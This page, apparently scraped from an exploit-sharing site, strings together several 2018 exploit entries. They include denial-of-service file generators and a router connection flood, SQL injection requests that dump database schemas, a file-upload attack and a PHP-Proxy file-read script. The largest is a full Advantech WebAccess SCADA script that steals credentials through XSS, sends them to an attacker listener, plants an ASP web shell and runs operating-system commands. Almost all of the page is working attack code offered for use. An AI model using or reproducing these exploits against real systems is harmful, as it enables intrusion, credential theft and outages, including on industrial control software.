Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=e7ed7dtjg0hq3qsv0vil80o086; path=/
Location: gpms/index.php
Content-Length: 281
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
HireHackking 
# Exploit Title: CdCatalog 2.3.1 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://cdcat.sourceforge.net
# Software Link: https://netcologne.dl.sourceforge.net/project/cdcat/cdcat/cdcat-2.3.1/cdcat-2.3.1.tar.bz2
# Version: 2.3.1
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# CTRL+O & File/Open/exp.hcf

#!/usr/bin/python
    
buffer = "A" * 21
 
payload = buffer
try:
    f=open("exp.hcf","w")
    print "[+] Creating %s bytes evil payload." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created."
HireHackking 
# Exploit Title: WinMTR 0.91 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://winmtr.net
# Software Link: http://winmtr.net/winmtr_download/
# Version: 0.91
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# Host: Payload

#!/usr/bin/python
    
buffer = "A" * 238
 
payload = buffer
try:
    f=open("exp.txt","w")
    print "[+] Creating %s bytes evil payload." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created."
HireHackking 
# Exploit Title: Zint Barcode Generator 2.6 - Denial of Service (PoC)
# Dork: N/A
# Date: 2018-11-01
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.zint.org.uk
# Software Link: https://sourceforge.net/projects/zint/files/latest/download
# Version: 2.6
# Category: Dos
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# Add 2D Component / 2D Component Data

#!/usr/bin/python
    
buffer = "A" * 44450
 
payload = buffer
try:
    f=open("exp.txt","w")
    print "[+] Creating %s bytes evil payload." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created."
HireHackking 
# Exploit Title: Advantech WebAccess SCADA 8.3.2 - Remote Code Execution
# Date: 2018-11-02
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: http://www.advantech.com
# Device: NRVMini2
# Software Link: http://downloadt.advantech.com/download/downloadsr.aspx?File_Id=1-1MDG1BH
# Version: 8.3.2
# Tested on: Windows Server 2008 R2
# CVE: CVE-2018-15705, CVE-2018-15707
# TRA: https://www.tenable.com/security/research/tra-2018-35
# Description:
#
# This code exploits two vulnerabilities to gain remote code execution
# with Administrator privileges:
#
# 1) CVE-2018-15707 to steal credentials (XSS). User-interaction required.
# 2) CVE-2018-15705 to write an ASP file to the server.

from http.server import HTTPServer, BaseHTTPRequestHandler
from base64 import decodestring
import re
import requests, urllib, json
import sys
import argparse

TIMEOUT = 5 # sec

def err_and_exit(msg):
    print '\n\nERROR: ' + msg + '\n\n'
    sys.exit(1)

# WADashboard client
class WsClient:
    def __init__(self, ip, port, https=False):
        self.ip = ip
        self.port = port
        self.https = https

        self.endpoint = 'https' if https else 'http'
        self.endpoint += '://' + ip + ':' + str(port)
        self.endpoint += '/WADashboard'

    # see if service is up
    def grab_projects(self):
        url = self.endpoint + '/api/dashboard/v6/waConfig/getWebAccessProjectList'
        r = requests.get(url, timeout=TIMEOUT)
        if "resString" in r.text:
            json_decoded = json.loads(r.text)
            if json_decoded['resString'] is not None and len(json_decoded['resString']) > 0:
                return json_decoded['resString']
        return None

    # success if we get cookies
    def login(self, projectName, user, pw):
        # issue a login request and set the cookies
        # POST /WADashboard/login?cont=dashboardViewer
        # projectName1=myproject&username=admin&password=hello&recId=
        url = self.endpoint + '/login?cont=dashboardViewer'
        data = {
            'projectName1'  : projectName,
            'username'      : user,
            'password'      : pw,
            'recId'         : ''
        }
        r = requests.post(url, data, timeout=TIMEOUT)
        if len(r.cookies) > 0:
            self.cookies = r.cookies
            return True     # success
        else:
            return False    # fail
        
    def write_file(self, filename, contents):
        # /WADashboard/api/dashboard/v1/files/writeFile?projectSpecies=myproject!savedConfiguration&folderpath=../../../../exec.asp&msg=contents&overwrite=true

        # post the writeFile request
        # for some reason, the data is required in the query string instead of POST data
        url = self.endpoint + '/api/dashboard/v1/files/writeFile'
        data = {
            'projectSpecies'    : victim['project'] + '!savedConfiguration',
            'folderpath'        : '../../../../' + filename,    # uploads to /Broadweb/ folder
            'msg'               : contents,
            'overwrite'         : 'true'
        }

        url += '?' + urllib.urlencode(data)
        r = requests.post(url, cookies=self.cookies, timeout=TIMEOUT)
        return (r.status_code == 200)

# This class will serve as an HTTP listener
class MyWebHandler(BaseHTTPRequestHandler):
    def do_GET(self):

        data = self.path.replace('/', '') # remove leading slash
        decoded = decodestring(data)

        print "\n***LINK CLICKED!***"

	try:
	    # carve out the piece we want to match
	    i = decoded.index('logOnWebService')
	    k = decoded.index('readNodeStatus')
	    chunk = decoded[i:k]

	    # find our match
	    regex = '^logOnWebService\\("(.+)", "(.*)"\\);.*'
	    m = re.match(regex, chunk)

            if not m:
                err_and_exit("Couldn't extract credentials...")

            print "\nCredentials stolen..."
            user = m.group(1)
            pw = m.group(2)
            print "- User: " + user
            print "- Pass: " + pw

	    # login to WADashboard
	    if not client.login(victim['project'], user, pw):
		err_and_exit("Credentials didn't work...")

	    print '\nLogged into WADashboard with credentials.'

            # write malicious ASP file
            asp_payload = '<% Set t=Server.CreateObject("webdobj.webdraw"):t.RemoteWinExec Request.QueryString("p"),Request.QueryString("n"),Request.QueryString("c"):Response.Write "Done."%>'
            filename = 'exec.asp'
            if not client.write_file(filename, asp_payload):
                err_and_exit("Write file failed...")

            print "\n'" + filename + "' written to disk."

            # execute OS command
            url = broadweb_root + '/' + filename
            data = {
                'p' : victim['project'],
                'n' : victim['node'],
                'c' : victim['cmd']
            }

            url += '?' + urllib.urlencode(data)
            r = requests.get(url, timeout=TIMEOUT)   # no cookie needed
            if r.status_code == 200:
                print "\nSuccessful request to '" + url + "'\n"
            else:
                print "\nThere may be something wrong with the ASP payload.\n"

            print "\nDone!"
	except Exception as e:
            print "Exception encountered: " + str(e)

        msg = 'hello poppet'

        self.send_response(200)
        self.end_headers()
        self.wfile.write(str.encode(msg))

# MAIN

# deal with command line flags
desc = '''This exploit targets Advantech WebAccess/SCADA 8.3.2. It has been tested against Windows 2008 R2 x64.

The goal of the script is to execute code remotely. User interaction is required.

The following operations will be conducted:
1) Ensure WebAccess application is running. (TCP port 80 by default)
2) Ensure WADashboard is running. (TCP port 8081 by default)
3) Ensure user-specified project exists.
4) Ensure user-specified node exists.
5) Generate malicious link to send to victim user. (exploits CVE-2018-15707 to steal credentials via XSS)
6) Start HTTP listener to receive credentials when victim clicks the link.
7) Login to WADashboard.
8) Write a malicious ASP file to the root of the WebAccess application. (exploits CVE-2018-15705)
Note: elevated privileges will be obtained using the Webdraw RemoteWinExec function.
9) Execute user-specified command.

Example (equivalent) commands:
python script.py -t 192.168.0.2 -p1 80 -p2 8081 -https false -proj myproject -node mynode -ip 192.168.0.3 -port 9999 -cmd calc.exe
python script.py -t 192.168.0.2 -proj myproject -node mynode -ip 192.168.0.3 -cmd calc.exe
'''

arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Target IP (Required)')
arg_parser.add_argument('-p1', type=int, default=80, help='WebAccess Port (Default: 80)')
arg_parser.add_argument('-p2', type=int, default=8081, help='WADashboard Port (Default: 8081)')
arg_parser.add_argument('-https', type=bool, default=False, help='HTTPS (Default: false)')
arg_parser.add_argument('-proj', required=True, help='Project name')
arg_parser.add_argument('-node', required=True, help='Node name')
arg_parser.add_argument('-ip', required=True, help='HTTP listener IP')
arg_parser.add_argument('-port', type=int, default=9999, help='HTTP listener port (Default: 9999)')
arg_parser.add_argument('-cmd', required=True, help='OS command to be executed')

args = arg_parser.parse_args()

# victim settings
victim = dict()
victim['ip'] = args.t
victim['web_port'] = args.p1         # Broadweb web app port
victim['ws_port'] = args.p2        # WADashboard Node.js service port
victim['https'] = args.https
victim['project'] = args.proj
victim['node'] = args.node
victim['cmd'] = args.cmd

# listener settings
listener = dict()
listener['ip'] = args.ip
listener['port'] = args.port

# validate IP addresses
ip_pattern = "[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+"
for ip in [victim['ip'], listener['ip']]:
    match = re.match(ip_pattern, ip) 
    if match is None:
	print "\nError: IP Address is invalid: '" + ip + "'.\n"
	arg_parser.print_help()
	sys.exit(1)

# start the real work
# ensure WebAccess ASP application is running
print "\nPerforming some banner checks to ensure services are running...\n"
proto = 'https' if victim['https'] else 'http'
broadweb_root = proto + '://' + victim['ip']
# no need to add port if it's 80 or 443
https = victim['https']
if (https and victim['web_port'] != 443) or (victim['web_port'] != 80 and not https):
    broadweb_root += ':' + str(victim['web_port'])
broadweb_root += '/broadWeb'
url = broadweb_root + '/bwRoot.asp'

try:
    r = requests.get(url, timeout=TIMEOUT)
except requests.exceptions.ConnectionError as e:
    err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['web_port']))

if 'Welcome to Advantech WebAccess' not in r.text:
    err_and_exit('WebAccess not found.')

print 'WebAccess is up.'

# ensure WADashboard Node.js service is running
# and projects are defined
client = WsClient(victim['ip'], victim['ws_port'], https=https)

try:
    projects = client.grab_projects()
except requests.exceptions.ConnectionError as e:
    err_and_exit('Cannot reach host ' + victim['ip'] + ' on port ' + str(victim['ws_port']))

if not projects:
    err_and_exit('Dashboard Viewer not found.')

print "Dashboard Viewer is up."

if len(projects) == 0:
    err_and_exit("No projects found...")

print "\nFound projects: "
for project in projects:
    print " - " + project

# ensure specified project exists
if victim['project'] not in projects:
    err_and_exit("Specified project, " + victim['project'] + " was not found...")

print "Specified project '" + victim['project'] + "' exists."

# ensure nodes are defined for project
# we have to specify a node name to run the custom RemoteWinExec() function
url = broadweb_root + '/' + victim['project']  +'.dpj'
r = requests.get(url, timeout=TIMEOUT)
node_list = list()
if "[nodelist]" in r.text:
    for line in r.text.split('\n'):
        regex = "^node[0-9]=(.*)$"
        m = re.match(regex, line, flags=re.MULTILINE)
        if m:
            node_list.append(m.group(1).strip())

if len(node_list) == 0:
    err_and_exit("No nodes found...")

print "\nFound nodes: "
for node in node_list:
    print ' - ' + node

if victim['node'] not in node_list:
    err_and_exit("Node, " + victim['node'] + " not in node list...")

print "Specified node '" + victim['node'] + "' exists."

# generate link to send to victim
print "\nSend this link to the victim:"
print "Keep in mind, they could be logged in via localhost."
link = broadweb_root + '/bwmainleft.asp?pid=1&pname=");i=document.createElement(\'img\');'
link += 'i.src="http://' + listener['ip'] + ':' + str(listener['port']) + '/'
link += '"%2bbtoa(document.getElementsByTagName(\'script\')[4].text);//'

print link

# start listener
print "\nListening on " + listener['ip'] + ":" + str(listener['port'])
print "Waiting for victim to click link..."
httpd = HTTPServer((listener['ip'], listener['port']), MyWebHandler)
httpd.handle_request()
HireHackking 
# Exploit Title: SiAdmin 1.1 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.bubul.net/
# Software Link: https://kent.dl.sourceforge.net/project/siadmin/SiAdmin%201.1/SiAdmin%201.1.zip
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/modul/mod_beasiswa/print.php?op=print&id=[SQL]
# 
GET /[PATH]/modul/mod_beasiswa/print.php?op=print&id=-4%27%20%20UNION%20%20SELECT%201,2,3,4,5,6,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),8--%20- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=va3kfka1v4dqvadpkdpm7f7vs0
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 13:22:52 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=0, must-revalidate
Pragma: public
Content-Disposition: inline; filename="Ansanwan-Laporan.pdf"
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/pdf

# POC: 
# 2)
# http://localhost/[PATH]/show.php?op=beasiswa&act=lihat&id=[SQL]
# 
GET /[PATH]/show.php?op=beasiswa&act=lihat&id=%2d%34%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%34%2c%35%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%37%2c%38%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=va3kfka1v4dqvadpkdpm7f7vs0
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 13:30:25 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6079
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
HireHackking 
# Exploit Title: Virgin Media Hub 3.0 Router - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2018-11-03
# Exploit Author: Ross Inman
# Vendor Homepage: https://www.broadbandchoices.co.uk/guides/hardware/virgin-media-broadband-routers
# Software Link: N/A
# Version: Virgin Media Hub 3.0
# Tested on: Linux
# CVE : N/A

#!/usr/bin/python2.7

import socket, sys, random, os

user_agents = [
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
]

def connection(ip,port):
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.settimeout(1)
	test = s.connect_ex((ip,port))
	s.close()
	if(test == 0):
		return True
	else:
		return False

def dos(ip,port):
	socks = []
	payload = """
POST / HTTP/1.1\
Host: {}
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: {}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
        """.format(ip,random.choice(user_agents))
	with open("/tmp/payload.txt","w") as f:
		f.write(payload)
		f.close()
	with open("/tmp/payload.txt","r") as f:
		lines = f.readlines()
		f.close()
	os.remove("/tmp/payload.txt")
	while(True):
		try:
			sys.stdout.write("\r[Info]Sending packets => {}".format(ip))
			s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
			s.connect((ip,port))
			for line in lines:
				s.send(line)
			socks.append(s)
		except KeyboardInterrupt:
			print"\n[Info]Closing connections..."
			for sock in socks:
				sock.close()
				socks.remove(sock)
			sys.exit(0)

def main():
	if(len(sys.argv) != 3):
		sys.exit("Usage: ./dos.py {target ip} {port}")
	else:
		target = sys.argv[1]
		port = int(sys.argv[2])
	print"[Info]Checking connection to target..."
	check = connection(target,port)
	if(not check):
		sys.exit("[Failure]Connection to target failed.")
	print"[Info]Starting attack on: {}".format(target)
	dos(target,port)

if(__name__ == "__main__"):
	main()
HireHackking 
# Exploit Title: WebVet 0.1a - 'id' SQL Injection
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://webvet.exreality.net/
# Software Link: https://netix.dl.sourceforge.net/project/webvet/webvet_2013_07_08.zip
# Version: 0.1a
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# /[PATH]/client.php
#091 	else if (!empty($_POST['form_search_client']))
#092 	{
#093 		$searchedClient = new Client();
#094 		if (!empty($_POST['id']))
#095 			$searchedClient->id = $_POST['id'];
#096 		if (!empty($_POST['lastname']))
#097 			$searchedClient->lastname = $_POST['lastname'];
#098 		if (!empty($_POST['patient']))
#099 			$searchedClient->patient = $_POST['patient'];
#100 
#101 		// do the search
#102 		$db_connection = db_open(db_user_name, db_user_passw, db_name);
#103 		if (!$db_connection) die;
#104 		$clients = db_search_client($searchedClient, clients_table_name, $db_connection);
#105 		include "clients_view.php";
#106 	}

# POC: 
# 1)
# http://localhost/[PATH]/client.php
# 
POST /[PATH]/client.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 525
id=1 UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 18:13:34 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1229
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/client.php
# 
POST /[PATH]/client.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 501
lastname=' UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 18:19:04 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1229
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

# POC: 
# 3)
# http://localhost/[PATH]/client.php
# 
POST /[PATH]/client.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 499
patient='  UNION SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)-- -&form_search_client=Efe
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 18:21:05 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1229
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
HireHackking 
# Exploit Title: Poppy Web Interface Generator 0.8 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-11-04
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://poppy.dc-development.de/
# Software Link: https://master.dl.sourceforge.net/project/poppy-beta-rc/poppy_0.8_beta_rc.zip
# Version: 0.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/phpWebFileManager-0.7/index.php
# 
POST /[PATH]/phpWebFileManager-0.7/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------497318546845924055941951022
Content-Length: 732
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_filename"
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_dir"
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_action"
upload_file
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_userfile[0]"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------497318546845924055941951022
Content-Disposition: form-data; name="fm_submit"
File upload
-----------------------------497318546845924055941951022--
HTTP/1.1 200 OK
Date: Sun, 04 Nov 2018 12:10:16 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

# POC: 
# 2)
# http://localhost/[PATH]/poppy_app/public/[FILE]
# 
<html>
<body>

#File Upload:
<form enctype="multipart/form-data" method="post" action="http://localhost/[PATH]/phpWebFileManager-0.7/index.php">
<input value="" name="fm_filename" type="hidden">
<input value="" name="fm_dir" type="hidden">
<input value="upload_file" name="fm_action" type="hidden">
<input value="" name="fm_userfile[0]" type="file">
<input name="fm_submit" value="File upload" type="submit">
</form>

#Create File:
<form method="post" action="http://localhost/[PATH]/phpWebFileManager-0.7/index.php">
<input value="" name="fm_filename" type="hidden">
<input value="" name="fm_dir" type="hidden">
<input value="create_file" name="fm_action" type="hidden">
<input value="test.php" name="fm_new_filename" type="text">
<input name="fm_submit" value="Create file" type="submit">
</form>

#File Edit:
<form method="post" action="http://localhost/[PATH]/phpWebFileManager-0.7/index.php">
<input value="test.php" name="fm_filename" type="hidden">
<input value="" name="fm_dir" type="hidden">
<input value="save_file" name="fm_action" type="hidden">
<textarea id="code" name="fm_file_data" rows="40" cols="140"></textarea>
<input name="fm_submit" value="Save" type="submit">
</form>

</body>
</html>
HireHackking 
# Exploit Title: PHP-Proxy 3.0.3 - Local File Inclusion
# Date: 04.11.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.php-proxy.com/
# Software Link: https://github.com/Athlon1600/php-proxy-app
# Version: v3.0.3
# Category: Webapps
# Tested on: XAMPP for Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target/index.php?q=file:///[FilePath]

# PoC

#!/usr/bin/python

import urllib2, httplib, sys

print "\n[*] PHP-Proxy 3.0.3 LFI PoC By AkkuS"
print "[*] My Blog - https://www.pentest.com.tr\n"
print "[+] usage: python " + __file__ + " http://<target_ip/domain>"
if (len(sys.argv) != 2):
    print "[*] Usage: poc.py <target_ip/domain>"
    exit(0)
ip_add = sys.argv[1]

fd = raw_input('[+] File or Directory: aka /etc/passwd and etc..\n')

print "Exploiting....."
print '\n'
URL = "http://" + ip_add + "/index.php?q=file:///" + fd + ""
print urllib2.urlopen(URL).read()
HireHackking 
